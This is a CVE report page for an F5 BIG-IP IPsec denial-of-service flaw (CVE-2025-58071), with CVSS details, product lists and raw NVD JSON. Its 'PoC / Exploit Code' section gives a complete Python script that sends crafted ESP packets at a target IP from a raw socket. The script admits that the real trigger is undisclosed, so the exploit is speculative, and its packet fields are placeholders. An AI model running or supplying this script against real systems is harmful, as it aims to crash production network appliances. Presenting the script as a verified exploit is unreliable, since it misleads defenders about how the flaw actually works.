Security Vulnerability Report
中文
CVE-2025-58071 CVSS 7.5 HIGH

CVE-2025-58071

Published: 2025-10-15 16:15:35
Last Modified: 2025-10-21 19:17:54
Source: [email protected]

Description

When IPsec is configured on the BIG-IP system, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_access_policy_manager:17.5.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:17.5.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:17.5.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_analytics:17.5.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_application_acceleration_manager:17.5.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_next_cloud-native_network_functions:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_next_cloud-native_network_functions:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_next_for_kubernetes:*:*:*:*:*:*:*:* - VULNERABLE
F5 BIG-IP(具体受影响版本请参考F5官方公告K000156746)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58071 PoC - F5 BIG-IP TMM DoS via IPsec # This PoC demonstrates sending malformed IPsec traffic to trigger TMM termination # Note: Specific triggering traffic details are undisclosed by F5 #!/usr/bin/env python3 import socket import struct import sys def craft_malformed_esp_packet(target_ip, target_port=0): """ Craft a malformed ESP (Encapsulating Security Payload) packet targeting the IPsec-enabled BIG-IP TMM. The specific malformed fields that trigger the vulnerability are undisclosed, but crafted IPsec packets can cause TMM to terminate. """ # IP Header (Protocol 50 = ESP) ip_header = struct.pack('!BBHHHBBH4s4s', 0x45, # Version + IHL 0x00, # DSCP/ECN 0x0050, # Total Length (placeholder) 0x0001, # Identification 0x0000, # Flags + Fragment Offset 64, # TTL 50, # Protocol (ESP) 0x0000, # Header Checksum (placeholder) socket.inet_aton(target_ip), # Source IP socket.inet_aton(target_ip) # Dest IP (loopback for testing) ) # Malformed ESP Header - SPI, Sequence Number, and payload # Crafting abnormal ESP payload to trigger TMM crash esp_spi = struct.pack('!I', 0xDEADBEEF) # Security Parameters Index esp_seq = struct.pack('!I', 0xFFFFFFFF) # Sequence Number esp_iv = b'\x00' * 16 # Initialization Vector # Malformed encrypted payload - abnormal length and content esp_payload = b'\xFF' * 64 + b'\x00' * 32 esp_padding = b'\x00' * 4 esp_pad_length = struct.pack('!B', 4) esp_next_header = struct.pack('!B', 59) # No Next Header esp_icv = b'\x00' * 16 # Integrity Check Value packet = ip_header + esp_spi + esp_seq + esp_iv + esp_payload + esp_padding + esp_pad_length + esp_next_header + esp_icv return packet def send_ipsec_dos(target_ip): """ Send crafted IPsec packets to trigger TMM DoS """ print(f"[*] Targeting {target_ip} with CVE-2025-58071 exploit") print("[*] Crafting malformed IPsec/ESP packets...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ESP) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) for i in range(10): packet = craft_malformed_esp_packet(target_ip) sock.sendto(packet, (target_ip, 0)) print(f"[+] Sent malformed ESP packet {i+1}/10") print("[*] Attack completed. Target TMM may have terminated.") except PermissionError: print("[-] Root privileges required for raw socket operations") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) send_ipsec_dos(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58071", "sourceIdentifier": "[email protected]", "published": "2025-10-15T16:15:35.057", "lastModified": "2025-10-21T19:17:54.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When IPsec is configured on the BIG-IP system, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-457"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "A7A0C1CA-EDEF-463F-B7C8-8B9E67239FC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "6538FBFE-AE3F-41DC-BE48-8A2444DE1F39"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "8CDAF78A-6C2B-4640-93DD-524A0D9D80CE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "4BEC05AA-EB63-4A34-94E8-81606329BA75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "F3007970-0661-4CAC-91A6-363396ED3B41"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "2450DC77-B46C-4886-AC9A-CF78B1EC4F06"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_visibility_and_reporting:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "D8BC9B56-DC91-4312-9A37-0892E1DCC97D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_automation_toolchain:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "B5C25C2C-608A-432F-B49C-CED71150801C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "96D77245-3641-49B9-BC32-472D460E5C1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_container_ingress_services:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "37AF1DFD-AE86-4F64-9941-75FAA0186ED8"}, {"vulnerable": true, ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.